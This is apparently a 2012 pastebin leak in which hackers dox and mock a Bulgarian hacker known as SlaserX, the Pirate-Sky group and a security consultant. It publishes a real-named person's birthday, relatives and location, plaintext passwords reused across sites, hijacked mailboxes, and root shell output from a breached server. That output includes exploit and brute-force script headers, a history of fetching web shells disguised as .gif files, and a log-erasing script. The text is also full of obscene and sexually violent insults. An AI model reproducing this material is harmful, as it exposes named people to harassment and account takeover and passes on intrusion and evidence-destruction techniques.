Untitled

a guest Jul 18th, 2012
  1.                 __________                __       _____   __________.__
  2.                 \______   \__  _  _______/  |_    /  |  |  \______   \  |__  __ __  ____
  3.                  |     ___/\ \/ \/ /    \   __\  /   |  |_  |     ___/  |  \|  |  \/    \
  4.                  |    |     \     /   |  \  |   /    ^   /  |    |   |   Y  \  |  /   |  \
  5.                  |____|      \/\_/|___|  /__|   \____   |   |____|   |___|  /____/|___|  /
  6.                                        \/            |__|                 \/           \/
  7.  
  8.  
  9.  
  10.  
  11.                                  LOL >            SlaserX               < LOL
  12.                                  LOL >          Pirate-Sky              < LOL
  13.                                  LOL >          SecurityGuy             < LOL
  14.  
  15.  
  16.  
  17.                                         * LOL * SlaserX * LOL *
  18.  
  19.  
  20. SlaserX is a well-known criminal and wannabe hacker from Bulgaria. He's been around for quite some time now. A few weeks ago the miserable idiot and his fellow minions got finally busted and the misguided cops mistakenly claimed to have arrested the most powerful hacker group in Bulgaria[1]. Wait, what?!
  21.  
  22. Cops, Y U so unbelievably stupid? You're nothing but miserable media whores. We've been fucking around with these kids and we certainly know how 1337 they are. We've got their passwords, we've been reading through their mail spools, we've been laughing at their hacking attempts and yet, you call them the most powerful hacker group. Yes, some of the most talented hackers worldwide are actually based in Eastern Europe, but you silly bitches won't ever hear about them. Suck on my hard cock and die, brainless cunts! How the fuck can you even be so stupid and lame?
  23.  
  24. Take a seat, enjoy this leak and remember.. this is absolutely nothing compared to what we've done to you, idiots.
  25.  
  26. [1] http://press.mvr.bg/en/News/news120704_08.htm
  27.  
  28. >> So, who's this guy?
  29.  
  30. First Name:     Ivan
  31. Last Name:      Bachvarov
  32. Nickname:       SlaSerX
  33. Birthday:       21.07.1986
  34. Height:         1.76cm
  35. Father:         Jecho Bachvarov
  36. Sister:         Mariana Bachvarova
  37. Girlfriend:     Mihaela Mandalcheva
  38. Location:       Burgas, Bulgaria
  39.  
  40. >> Let's take a look at what his passwords look like.
  41.  
  42. vbox7.com (slaserx:1986125),
  43. hit.bg (slaserx:1986125),
  44. theunkn0wn.org (slaserx:1986125),
  45. kaldata.com (slaserx:1986125),
  46. bghelp.bg (slaserx:1986125),
  47. etc.
  48.  
  49. >> Yes, password reuse is so typical for these idiots. You still call yourself a hacker? Here are some of his already owned mail boxes.
  50.  
  51. slaserx@abv.bg
  52. froztfi2@abv.bg
  53. slaserx@dir.bg
  54. routeros@abv.bg
  55. slaserx@mbox.contact.bg
  56.  
  57. >> Guess how 1337 his passwords were? ;) Now let's take a look at some of his boxes.
  58.  
  59. root@bgdns:/root# uname -a
  60. Linux bgdns 2.6.32-5-686 #1 SMP Wed Jan 12 04:01:41 UTC 2011 i686 GNU/Linux
  61.  
  62.  
  63. root@bgdns:/root# w
  64.  23:15:45 up  6:26,  2 users,  load average: 0.08, 0.09, 0.09
  65. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
  66. root     pts/0    office           16:51    6:23m  0.42s  0.42s -bash
  67. root     pts/1    office           17:37    5:17m  0.34s  0.34s -bash
  68.  
  69.  
  70. root@bgdns:/root# cat /etc/shadow
  115.  
  116. >> Ever wondered what the most powerful hacker tools look like? Well, take a look..
  117.  
  118. root@bgdns:/root# head -25 l33t/a.pl
  119. #!/usr/bin/perl
  120.  
  121. use IO::Socket;
  122.  
  123.  
  124. print q{
  125. #######################################################################
  126. #    vBulletin. Version 4.0.1 Remote SQL Injection Exploit            #
  127. #                      By indoushka                                   #
  128. #                     www.iq-ty.com/vb                                #
  129. #               Souk Naamane  (00213771818860)                        #
  130. #           Algeria Hackerz (indoushka@hotmail.com)                   #
  131. #          Dork: Powered by vBulletin. Version 4.0.1                  #
  132. #######################################################################
  133. };
  134.  
  135. if (!$ARGV[2]) {
  136.  
  137. print q{
  138.         Usage: perl  VB4.0.1.pl host /directory/ victim_userid
  139.  
  140.        perl  VB4.0.1.pl www.vb.com /forum/ 1
  141.  
  142.  
  143. };
  144.  
  145.  
  146. root@bgdns:/root# head -5 l33t/gen
  147. #!/usr/bin/perl
  148. ##
  149. ###  bren.pl . Generate every character combination for 15 characters in length(ughh.)
  150. ##
  151. #
  152.  
  153.  
  154. root@bgdns:/root# head -30 l33t/t.pl
  155. #!/usr/bin/perl
  156.  
  157. use IO::Socket;
  158. use LWP::Simple;
  159. use MIME::Base64;
  160.  
  161. $host     = $ARGV[0];
  162. $user     = $ARGV[1];
  163. $port     = $ARGV[2];
  164. $list     = $ARGV[3];
  165. $file     = $ARGV[4];
  166. $url = "http://".$host.":".$port;
  167. if(@ARGV < 3){
  168. print q(
  169. ###############################################################
  170. #               Cpanel Password Brute Force Tool              #
  171. ###############################################################
  172. #     usage : cpanel.pl [HOST] [User] [PORT][list] [File]    #
  173. #-------------------------------------------------------------#
  174. #    [Host] : victim Host             (simorgh-ev.com)        #
  175. #    [User] : User Name               (demo)                  #
  176. #    [PORT] : Port of Cpanel          (2082)                  #
  177. #[list] : File Of password list   (list.txt)              #
  178. #    [File] : file for save password  (password.txt)          #
  179. #                                                             #
  180. ###############################################################
  181. #            (c)oded By Hessam-x / simorgh-ev.com             #
  182. ###############################################################
  183. );exit;}
  184.  
  185.  
  186. root@bgdns:/root# tar tvf tools.tar
  187. drwxr-xr-x root/root         0 2011-02-11 11:14 tools/
  188. -rwxr-xr-x root/root       904 2011-01-15 18:18 tools/stop.flood
  189. -rwxr-xr-x root/root       700 2011-01-15 18:21 tools/monitor
  190. -rw-r--r-- slaserx/slaserx 1800 2011-02-11 11:11 tools/shells.zip
  191. -rwxr-xr-x root/root       1853 2011-02-07 18:30 tools/check.ssh
  192. drwxr-xr-x root/root          0 2011-01-16 19:45 tools/sms/
  193. -rwxr-xr-x root/root       1360 2011-01-16 19:26 tools/sms/212.70.159.86
  194. -rwxr-xr-x root/root       1332 2011-01-16 19:41 tools/sms/212.70.159.82-m
  195. -rwxr-xr-x root/root       1326 2011-01-16 19:42 tools/sms/212.70.159.86-m
  196. -rwxr-xr-x root/root       1271 2011-01-16 19:30 tools/sms/7.7.7.7
  197. -rwxr-xr-x root/root       1331 2011-01-16 19:43 tools/sms/212.70.159.87-m
  198. -rwxr-xr-x root/root        630 2011-01-19 09:47 tools/sms/run
  199. -rwxr-xr-x root/root       1333 2011-01-16 19:42 tools/sms/212.70.159.83-m
  200. -rwxr-xr-x root/root       1365 2011-01-16 19:27 tools/sms/212.70.159.87
  201. -rwxr-xr-x root/root       1367 2011-01-16 18:50 tools/sms/212.70.159.83
  202. -rwxr-xr-x root/root       1366 2011-01-16 18:49 tools/sms/212.70.159.82
  203. -rwxr-xr-x root/root       1332 2011-01-16 19:40 tools/sms/94.156.142.99-m
  204. -rwxr-xr-x root/root       1366 2011-01-16 18:45 tools/sms/94.156.142.99
  205. -rwxr-xr-x root/root        528 2011-01-15 18:20 tools/unban
  206. -rwxr-xr-x root/root        526 2011-01-15 18:19 tools/ban
  207. -rwxr-xr-x root/root        136 2011-01-15 18:36 tools/grep.404
  208. -rwxr-xr-x root/root        468 2011-01-15 18:35 tools/logged
  209. -rwxr-xr-x root/root        302 2011-01-15 18:22 tools/dellog
  210. -rw-r--r-- root/root         14 2011-02-07 18:30 tools/bannedips.txt
  211. drwxr-xr-x root/root          0 2011-02-11 14:38 tools/shells/
  212. -rwxr-xr-x root/root        143 2010-07-16 13:41 tools/shells/find.r57
  213. -rwxr-xr-x root/root         12 2010-07-16 13:45 tools/shells/a
  214. -rwxr-xr-x root/root        144 2010-07-16 13:56 tools/shells/find.eval
  215. -rwxr-xr-x root/root        178 2010-07-16 14:35 tools/shells/find.shell
  216. -rwxr-xr-x root/root        144 2010-07-16 13:45 tools/shells/find.rt13
  217. -rwxr-xr-x root/root        153 2010-07-16 13:49 tools/shells/find.decode
  218. -rwxr-xr-x root/root      34461 2011-02-11 14:40 tools/shells/scan.txt
  219. -rwxr-xr-x root/root        143 2010-06-30 14:57 tools/shells/find.c99
  220. drwxr-xr-x root/root          0 2011-02-04 20:46 tools/backup/
  221. -rwxr-xr-x root/root        641 2011-02-04 20:44 tools/backup/backup-rsbg
  222. -rwxr-xr-x root/root        657 2011-02-04 20:45 tools/backup/backup-slaserx
  223. -rwxr-xr-x root/root        271 2011-02-07 11:23 tools/backup/run
  224. -rwxr-xr-x root/root        650 2011-02-04 20:41 tools/backup/backup-psc
  225.  
  226.  
  227. root@bgdns:/root# tar tzvf t.tar.gz
  228. drwxr-xr-x root/root         0 2011-03-01 20:20 l33t/
  229. -rwxr-xr-x root/root      2358 2011-02-28 17:26 l33t/a.pl
  230. -rwxr-xr-x root/root    961923 2011-02-27 01:31 l33t/list.txt
  231. -rwxr-xr-x root/root     18883 2010-12-20 01:09 l33t/slowloris.pl
  232. -rwxr-xr-x root/root       156 2011-03-01 18:17 l33t/test.txt
  233. -rwxrwxrwx root/root        11 2011-02-28 17:26 l33t/a
  234. -rwx--x--x root/root     66502 2011-02-27 06:46 l33t/list.txt.save
  235. -rw-r--r-- root/root     20056 2011-03-01 20:21 l33t/ssh2ftpcrack.tar.bz2
  236. -rwxr-xr-x root/root      2109 2011-02-27 00:51 l33t/t.pl
  237. -rwxr-xr-x root/root      6359 2011-02-27 00:52 l33t/gen
  238.  
  239.  
  240. root@bgdns:/root# cat .bash_alias
  241. # some more ls aliases
  242. alias less='less -SR'
  243. alias l='ls -lLBhX --time-style=locale'
  244. alias la='ls -la $1 | less'
  245. alias ll='ls -lX'
  246. alias lx='ls -lXB' #sort by ext
  247. alias lk='ls -lSr' #soft by size
  248.  
  249. # Alias's to modifed commands
  250. alias ps='ps auxf'
  251. alias home='cd ~'
  252. alias pg='ps aux | grep' #requires an argument
  253. alias lg='ls -la | grep' #requires an argument
  254. alias un='tar -zxvf'
  255. alias df='df -hT'
  256. alias ping='ping -c 10'
  257. #alias net-restart='sudo /etc/init.d/networking restart'
  258. #alias windir="cd '/home/hkvn/.wine/drive_c/Program Files'"
  259. alias ..='cd ..'
  260. alias update='sudo apt-get update'
  261. alias upgrade='sudo apt-get upgrade'
  262. alias install='sudo apt-get install'
  263. alias remove='sudo apt-get remove'
  264. #alias eclipse='eclipse -vmargs -Xmx512M'
  265. #alias firefox='firefox-3.5'
  266. alias ipconfig='ifconfig -a'
  267.  
  268. #My alias
  269. alias flood='netstat'
  270. alias stop='/root/tools/stop.flood'
  271. alias ban='/root/tools/ban.pl'
  272. alias unban='/root/tools/unban.pl'
  273. alias monitor='/root/tools/monitor.sh'
  274. alias cron='env EDITOR=nano crontab -e'
  275. alias editcfg='pico /var/www/ispcp/gui/index.php'
  276. alias arest='/etc/init.d/apache2 restart'
  277. alias cls='clear'
  278. alias q='exit'
  279. # Some ssh connections
  280. alias shell='ssh -l slaserx slaserx.ath.cx'
  281. #alias xalo='sudo vpnc-connect xalo.conf'
  282.  
  283. # Some ping commands
  284. #alias pga='ping 192.168.1.1 -c 10'
  285. #alias pgo='ping google.com -c 10'
  286. #alias phk='ping hkvn.info -c 10'
  287. #alias pch='ping chuyenhungyen.org -c 10'
  288.  
  289. #Some chmod commands
  290. alias mx='chmod a+x'
  291. alias 000='chmod 000'
  292. alias 644='chmod 644'
  293. alias 755='chmod 755'
  294.  
  295.  
  296. # cat .bash_history
  297. clear
  298. nmap localhost
  299. exit
  300. host perfektno.com
  301. w
  302. iptables -L |grep 77.78.36.40
  303. ban 77.78.36.40
  304. pico /etc/init.d/firewall
  305. ls -a
  306. iptables -L
  307. clear
  308. search metaspolit
  309. search metasploit
  310. search icmp rate
  311. pico /etc/init.d/firewall
  312. iptables -L
  313. stop
  314. flood
  315. clear
  316. exit
  317. pico /etc/networks
  318. pico /etc/network/interfaces
  319. exit
  320. host cs-adrenalines.info
  321. host 79.124.67.194
  322. stop
  323. flood
  324. cat /var/log/fail2ban.log
  325. cat /var/log/psad/fw_check
  326. cat /var/log/psad/top_attackers
  327. clear
  328. clear
  329. stop
  330. exit
  331. cd l33t/
  332. wget https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  333. ls -a
  334. wget
  335. wget --help
  336. wget --help |grep ssl
  337. wget --no-check-certificate https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  338. tar -jxvf nikto-2.1.4.tar.bz2
  339. cd nikto-2.1.4/
  340. ls -a
  341. ./nikto.pl
  342. ./nikto.pl -host abv.bg -root
  343. ./nikto.pl -host abv.bg -root+
  344. ./nikto.pl -host abv.bg
  345. ./nikto.pl
  346. ./nikto.pl -host
  347. ./nikto.pl -host pweb.co.cc
  348. w
  349. last
  350. flood
  351. stop
  352. apachectl restart
  353. stop
  354. apachectl restart
  355. cd /root/tools/
  356. ./dellog
  357. cat /var/log/apache2/pirate-sky.info-combined.log
  358. cat /var/log/apache2/pirate-sky.info-combined.log
  359. cat /var/log/apache2/pirate-sky.info-combined.log
  360. iptables -L
  361. host eco.gov.kz
  362. cat /var/log/apache2/pirate-sky.info-combined.log
  363. apachectl restart
  364. apachectl restart
  365. ls -a
  366. cron
  367. cron
  368. /etc/init.d/cron restart
  369. cd /var/www/virtual/warez-database.org/htdocs/
  370. ls -a
  371. cd hooks/
  372. ls -a
  373. cd ..
  374. ls -a
  375. cd converge_local/
  376. ls -a
  377. ls -a
  378. ls -a
  379. wget xpls.hit.bg/shell/shell.gif
  380. rm -rf shell.gif
  381. wget xpls.hit.bg/shell/linuxbg.shell
  382. wget xpls.hit.bg/shell/linuxbg.gif
  383. rm -rf linuxbg.*
  384. ls -a
  385. ls -a
  386. mv /home/slaserx/faq.php ./
  387. ls -a
  388. rm -rf .htaccess
  389. ls -a
  390. rm -rf faq.php
  391. /
  392. cd /
  393. pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  394. pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  395. clear
  396. whois privatecrew.net
  397. whois privatecrew.net
  398. whois bgdns.info
  399. host freebsd.bg
  400. clear
  401. genpasswd
  402. clear
  403. genpasswd
  404. genpasswd
  405. genpasswd
  406. ls -a
  407. cd /var/www/virtual/privatecrew.net/htdocs/
  408. ls -s
  409. ls -a
  410. rm -rf *
  411. ls -a
  412. ls -a
  413. cd ..
  414. cp ../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  415. ls -a
  416. cat ../pirate-sky.info/htdocs/conf_global.php
  417. ls -a
  418. cp pirate-sky.info-backup-2011.03.06-000737.tar.bz2 backups/
  419. clear
  420. ls -a
  421. rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  422. rm -rf backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  423. genpasswd
  424. genpasswd
  425. genpasswd
  426. ls -a
  427. cd htdocs/
  428. ls -a
  429. pico /etc/init.d/firewall
  430. cat /etc/init.d/firewall
  431. iptables -t filter -A INPUT -s 95.42.32.36 -j ACCEPT
  432. pico /etc/init.d/firewall
  433. /etc/init.d/firewall
  434. flood
  435. stop
  436. ls -a
  437. iptables -L |grep 94.156.142.66
  438. iptables -L |grep lucifer
  439. stop
  440. iptables -L |grep 95.42.32.36
  441. iptables -L
  442. cd /var/www/fcgi/
  443. ls -a
  444. pico warez-database.org/php5/php.ini
  445. pico privatecrew.net/php5/php.ini
  446. pico privatecrew.net/php5/php.ini
  447. apachectl restart
  448. pico privatecrew.net/php5/php.ini
  449. apachectl restart
  450. ls -a
  451. pico pirate-sky.com/php5/php.ini
  452. pico privatecrew.net/php5/php.ini
  453. apachectl restart
  454. cd /root/tools/
  455. ls -a
  456. cd shells/
  457. pico new.p
  458. pico new
  459. ls -a
  460. ./a
  461. ls -a
  462. pico find.r57
  463. pico new
  464. ./find.
  465. ./new
  466. ls -a
  467. ls -a
  468. cd /var/www/virtual/
  469. ls -a
  470. cd privatecrew.net/htdocs/
  471. cd /root/tools/
  472. cd shells/
  473. ./new
  474. ls -a
  475. pico new
  476. pico find.eval
  477. ls -a
  478. pico new
  479. pico new
  480. ./new
  481. ls -a
  482. pico new
  483. ls -a
  484. ./new
  485. ls -a
  486. pico new
  487. ls -a
  488. ./new
  489. pico new
  490. ./new
  491. ls -a
  492. rm -rf new
  493. pico find.shell
  494. cat scan.txt
  495. pico scan.txt
  496. rm -rf scan.txt
  497. ls -a
  498. ./find.shell
  499. ls -a
  500. cat scan.txt
  501. ls -a
  502. rm -rf scan.txt
  503. cat sc
  504. ls -a
  505. pico find.shell
  506. pico find.shell
  507. ./find.shell
  508. cat scan.txt
  509. rm -rf scan.txt
  510. ls -a
  511. ./find.shell
  512. cat scan.txt
  513. cat scan.txt |grep faq.php
  514. ls -a
  515. rm -rf scan.txt
  516. pico /var/www/virtual/privatecrew.net/htdocs/faq.php
  517. pico find.shell
  518. ls -a
  519. ./find.
  520. ./find.shell
  521. cat scan.txt
  522. ls -a
  523. clear
  524. cd /var/www/virtual/
  525. ls -a
  526. cd privatecrew.net/
  527. ls -a
  528. cd htdocs/
  529. cd 0893552070/
  530. ls -a
  531. wget http://xpls.hit.bg/shell/c99.gif
  532. wget http://xpls.hit.bg/shell/devil.gif
  533. wget http://xpls.hit.bg/shell/linux.gif
  534. ls -a
  535. mv linux.gif linux.php
  536. ls -a
  537. mv devil.gif devil.php
  538. mv c99.gif c99.php
  539. ls -a
  540. wget http://xpls.hit.bg/shell/shell.gif
  541. mv shell.gif shell.php
  542. ls -a
  543. ls -a
  544. ls -a
  545. ls -a
  546. ls -a
  547. ls -a
  548. ls -a
  549. cp linux.php /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/
  550. rm -rf /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/linux.php
  551. ls -a
  552. ls -a
  553. ls -a
  554. clear
  555. ls -a
  556. cd ..
  557. rm -rf 0893552070/
  558. ls -a
  559. exit
  560. ls -a
  561. ls -a
  562. cd /var/www/virtual/pirate-sky.
  563. cd /var/www/virtual/privatecrew.net/htdocs/
  564. ls -a
  565. cd a
  566. ls -a
  567. cd asd/
  568. ls -a
  569. ls -a
  570. ls -a
  571. ls -a
  572. ls -a
  573. ls -a
  574. ls -a
  575. ls -a
  576. ls -a
  577. ls -a
  578. ls -a
  579. ls -a
  580. ls -a
  581. ls -a
  582. ls -a
  583. ls -a
  584. ls -a
  585. rm crontab -l
  586. crontab -l
  587. ls -a
  588. ls -a
  589. ls -a
  590. ls -a
  591. ls -a
  592. ls -a
  593. ls -a
  594. cd ..
  595. ls -a
  596. ls -a
  597. rm -rf admin/
  598. rm -rf cache/
  599. rm -rf con*
  600. ls -a
  601. rm -rf includes/
  602. ls -a
  603. ls -a
  604. rm -rf interface/
  605. rm -rf ips_kernel/
  606. ls -a
  607. rm -rf public/
  608. rm -rf starforum/
  609. ls -a
  610. rm -rf uploads/
  611. ls -a
  612. ls -a
  613. ls -a
  614. cd ..
  615. cd htdocs/
  616. cd ..
  617. cd backups/
  618. ls -a
  619. cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  620. cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  621. ls -a
  622. pico /etc/crontab
  623. ls -a
  624. cd ..
  625. ls -a
  626. cd htdocs/
  627. ls -a
  628. cd ..
  629. cd backups/
  630. rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  631. cd ..
  632. cd htdocs/
  633. cd pp/
  634. ls -a
  635. ls -a
  636. ls -a
  637. ls -a
  638. ls -a
  639. ls -a
  640. host mikrotik-bg.net
  641. host 195.191.149.89
  642. cat /var/log/cron.log
  643. ls -a
  644. crontab -l
  645. cron
  646. /etc/init.d/cron restart
  647. /etc/init.d/cron status
  648. ls -a
  649. ls -a
  650. cat /var/log/cron.log
  651. cat /var/log/cron.log |grep err
  652. clear
  653. ls -a
  654. ls -a
  655. ls -a
  656. ls -a
  657. ls -a
  658. ls -a
  659. ls -a
  660. ls -a
  661. ls -a
  662. ls -a
  663. ls -a
  664. ls -a
  665. cat /var/log/cron.log
  666. ls -a
  667. ls -a
  668. crontab -l
  669. ls -a
  670. ls -a
  671. cat /var/log/cron.log
  672. ls -a
  673. ls -a
  674. ls -a
  675. ls -a
  676. ls -a
  677. ls -a
  678. ls -a
  679. ls -a
  680. ls -a
  681. ls -a
  682. ls -a
  683. ls
  684. ls
  685. ls -a
  686. ls -a
  687. ls -a
  688. ls -a
  689. ls -a
  690. ls -la
  691. ls -a
  692. ls -a
  693. ls -a
  694. ls -a
  695. ls -a
  696. cat /var/log/cron.log
  697. ls -a
  698. ls -a
  699. ls -a
  700. ls -a
  701. ls -a
  702. ls -a
  703. wget xpls.hit.bg/shell.gif
  704. wget xpls.hit.bg/linux.gif
  705. mv linux.gif linux.php
  706. mv shell.gif shell.php
  707. ls -a
  708. ls -a
  709. ls -a
  710. ls -a
  711. ls -a
  712. ls -a
  713. ls -a
  714. ls -a
  715. rm -rf /tmp/scan.txt
  716. ls -a
  717. ls -a
  718. ls -la
  719. ls -a
  720. ls -a
  721. ls -a
  722. pico linux.php
  723. ls -a
  724. rm -rf linux.php
  725. rm -rf shell.php
  726. ls -a
  727. ls -a
  728. wget xpls.hit.bg/shell/shell.gif
  729. wget xpls.hit.bg/shell/linux.gif
  730. mv linux.gif linux.php
  731. mv shell.gif shell.php
  732. pico shell.php
  733. ls -a
  734. pico shell.php
  735. ls -a
  736. wget xpls.hit.bg/shell/shell.gif
  737. mv linux.gif linux.php
  738. wget xpls.hit.bg/shell/linux.gif
  739. ls -a
  740. mv linux.gif linux.php
  741. mv shell.gif shell.php
  742. ls -a
  743. ls -a
  744. ls -a
  745. ls -a
  746. ls -a
  747. cat /tmp/scan.txt
  748. ls -a
  749. ls -a
  750. ls -a
  751. ls -a
  752. cat /var/log/cron.log
  753. ls -a
  754. ls -a
  755. ls -a
  756. ls -a
  757. ls -a
  758. ls -a
  759. ls -a
  760. ls -a
  761. ls -a
  762. cd ..
  763. cd ..
  764. cd ..
  765. cd ..
  766. exit
  767. cd /var/www/virtual/
  768. ls -a
  769. cd linuxbg.info/
  770. cd backups/
  771. ls -a
  772. rm -rf t3es_vb.sql.bz2
  773. ls -a
  774. rm -rf t3es_soze.sql.bz2
  775. ls -a
  776. whois cms-bg.com
  777. whois jump.bg
  778. stop
  779. cat /tmp/scan.txt
  780. cat /var/log/apache2/other_vhosts_access.log
  781. cat /var/log/apache2/default-error.log
  782. clear
  783. cat /var/log/apache2/default-error.log
  784. clear
  785. cat /var/log/apache2/default-error.log
  786. cat /var/log/apache2/default-error.log
  787. cat /var/log/apache2/default-error.log
  788. clear
  789. clear
  790. clear
  791. exit
  792. os -a
  793. pico /etc/init.d/firewall
  794. ping abv.bg
  795. ls -a
  796. exit
  797.  
  798.  
  799. root@bgdns:/root/tools/backup# cat backup-psc
  800. #!/bin/sh
  801. #Created by SlaSerX
  802. #red='1;31m'
  803. TARGET_EMAIL="359887538110@sms.mtel.net"
  804.  
  805. # local directory to pickup *.tar.gz file
  806.  
  807. tar zcvf /backup/psc/pirate-sky.$(date +%s).$(date +"%d-%m-%Y").tgz /var/www/virtual/pirate-sky.com/backups/
  808.  
  809. # ftp remote connections
  810.  
  811. FTPU="backup" # ftp login name
  812. FTPP="1986125" # ftp password
  813. FTPS="85.217.204.199" # remote ftp server
  814. FTPF="/home/backup/psc/" # remote ftp server directory for $FTPU & $FTPP
  815. LOCALD="/backup/psc/*.tgz"
  816. ncftpput -m -u $FTPU -p $FTPP $FTPS  $FTPF $LOCALD
  817.  
  818. echo
  819. echo -e "            \e[${red}   Upload psc Backup \e[m"
  820. echo 'pirate-sky' | mail -s "Backup Uploaded:" $TARGET_EMAIL
  821. echo
  822.  
  823. root@bgdns:/root/tools# head -10 check.ssh
  824. #!/usr/bin/perl
  825. ##############################################################################
  826. # By BumbleBeeWare.com 2006
  827. # SSH Log Checker
  828. # sshlogcheck.cgi
  829. # reads ssh log and blocks hacking attempts using ip tables
  830. ##############################################################################
  831. # CONFIGURE
  832. ##############################################################################
  833.  
  834.  
  835. root@bgdns:/root/tools# cat dellog
  836. #!/bin/bash
  837. #Created by SlaSerX
  838. red='1;31m'
  839. /bin/rm -rf /var/log/apache2/*.log
  840. /bin/rm -rf /var/log/apache2/*.log.*
  841. /bin/rm -rf /var/log/apache2/users/*.log
  842. /bin/rm -rf /var/log/apache2/users/*.log.*
  843. /etc/init.d/apache2 restart
  844. echo -e " \e[${red} Apache logs Erase. Apache has been restarted\e[m"
  845.  
  846.  
  847. root@bgdns:/root/tools# cat grep.404
  848. grep "404" /var/log/apache2/users/pirate-sky.com-access.log | grep "`date +%d/%b/%Y`" | mailx -s 'SUBJECT GOES HERE' 'routeros@abv.bg'
  849.  
  850. >> Refer to the URL at the end of the file for some more fun.
  851.  
  852.  
  853.  
  854.                                         * LOL * Pirate-Sky * LOL *
  855.  
  856. Lamez.org, Pirate-Sky, World Warez Crew, CyberWarrior Invasion Group, etc. are all the same bitches and idiots again and again. They've been continuously renaming their own groups due to all kind of spectacular fails during the years. These are basically brainless infants playing with SQLmap and defacing outdated and improperly configured CMSs.
  857.  
  858. You can clearly see how randomly they choose their targets -
  859. http://www.zone-h.org/archive/notifier=Cyber%20Warrior%20Invasion
  860.  
  861. >> Check the aforementioned URL for their databases. ;)
  862.  
  863.  
  864.  
  865.                                         * LOL * SecurityGuy * LOL *
  866.  
  867. Alexander Sverdlov a.k.a. the SecurityGuy is one of those pseudo-security whores that you'd like to publicly rape. This information security illiterate has been making money through consultancy and training services for ages. Giving your money to this miserable monkey will eventually boost your false sense of security, but nothing more or less. Beware of who you're entrusting your security decisions. Really.
  868.  
  869. >> Let's just briefly review what's this bitch up to.
  870.  
  871. nopasara@oss.bg [/home/nopasara/public_html/securityguy]# uname -a
  872. Linux hera.superhosting.bg 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
  873.  
  874.  
  875. nopasara@oss.bg [/home/nopasara/public_html/securityguy]# id
  876. uid=32684(nopasara) gid=32686(nopasara) groups=32686(nopasara)
  877.  
  878.  
  879. nopasara@oss.bg [/home/nopasara]# ls -lia
  880. total 28108
  881. 35897345 drwx--x--x  18 nopasara nopasara     4096 Mar 12 14:04 ./
  882.        2 drwx--x--x 660 root     root        20480 Mar 19 16:50 ../
  883. 35897557 -rw-------   1 nopasara nopasara     3048 Jan 18  2010 .bash_history
  884. 35897347 -rw-r--r--   1 nopasara nopasara       33 Dec 10  2008 .bash_logout
  885. 35897346 -rw-r--r--   1 nopasara nopasara      176 Dec 10  2008 .bash_profile
  886. 35897348 -rw-r--r--   1 nopasara nopasara      124 Dec 10  2008 .bashrc
  887. 35897357 -rw-------   1 nopasara nopasara       17 Dec 10  2008 .contactemail
  888. 35897376 drwx------   5 nopasara nopasara     4096 Mar  4 11:07 .cpanel/
  889. 35897878 -rw-------   1 nopasara nopasara       15 Dec 31  2008 .cpanel-logs
  890. 35897520 -rw-r--r--   1 nopasara nopasara        6 Mar 20 02:45 .dns
  891. 35897450 drwxr-x---   7 nopasara nopasara     4096 Feb 25  2010 .fantasticodata/
  892. 35897436 -rw-------   1 nopasara nopasara       17 Feb 18 01:53 .ftpquota
  893. 35897353 drwxr-x---   3 nopasara nobody       4096 Jan  4  2009 .htpasswds/
  894. 35897354 -rw-------   1 nopasara nopasara       12 Mar  4 10:44 .lastlogin
  895. 35897419 drwx------   2 nopasara nopasara     4096 Dec 19  2008 .trash/
  896. 35898508 -rw-------   1 nopasara nopasara     1808 Jan 18  2010 .viminfo
  897. 35897374 lrwxrwxrwx   1 nopasara nopasara       34 Dec 10  2008 access-logs -> /usr/local/apache/domlogs/nopasara/
  898. 35946500 drwxr-xr-x   2 nopasara nopasara     4096 Nov 25 15:44 backups/
  899. 35897650 -rw-r-----   1 nopasara nopasara        1 Dec 27  2008 cpbackup-exclude.conf
  900. 36209930 drwxr-xr-x   3 nopasara nopasara     4096 Jul 26  2009 default/
  901. 35897906 drwxr-xr-x   2 nopasara nopasara     4096 Apr 12  2009 docs/
  902. 35897349 drwxr-x---   3 nopasara mail         4096 Feb  6 16:07 etc/
  903. 36044801 drwx------   2 nopasara nopasara    12288 Feb 28 15:20 logs/
  904. 35897351 drwxrwx---   7 nopasara nopasara     4096 Apr 21  2010 mail/
  905. 35963400 drwxr-xr-x   2 nopasara nopasara     4096 Jan 16  2010 mysql/
  906. 35898497 -rw-r--r--   1 nopasara nopasara  4128921 Jan 10  2010 nopasara_blog.sql
  907. 35897470 -rw-r--r--   1 nopasara nopasara   723362 Feb 13 18:25 nopasara_emea.sql
  908. 35897856 -rw-r--r--   1 nopasara nopasara    38813 Feb 15 13:28 php.ini
  909. 35932502 drwxr-xr-x   3 nopasara nopasara     4096 Jan 27  2010 procedures/
  910. 35897355 drwxr-xr-x   3 nopasara nopasara     4096 Nov  6  2005 public_ftp/
  911. 35897352 drwxr-x---  22 nopasara nobody       4096 Feb 28 01:31 public_html/
  912. 35898505 -rw-r--r--   1 nopasara nopasara 23699498 Jan 18  2010 sverdlov.sql
  913. 35913892 drwxr-xr-x   2 nopasara nopasara     4096 May 20  2009 test/
  914. 35897350 drwxr-xr-x   7 nopasara nopasara     4096 Mar  4 11:07 tmp/
  915. 35897358 lrwxrwxrwx   1 nopasara nopasara       11 Dec 10  2008 www -> public_html/
  916.  
  917.  
  918. nopasara@oss.bg [/home/nopasara/public_html]# ls -lia
  919. total 2286196
  920. 35897352 drwxr-x--- 22 nopasara nobody         4096 Feb 28 01:31 ./
  921. 35897345 drwx--x--x 18 nopasara nopasara       4096 Mar 12 14:04 ../
  922. 35897364 -rw-r--r--  1 nopasara nopasara          0 Feb 13 23:17 .htaccess
  923. 35967226 drwxr-xr-x  2 nopasara nopasara       4096 Jul  5  2009 _notes/
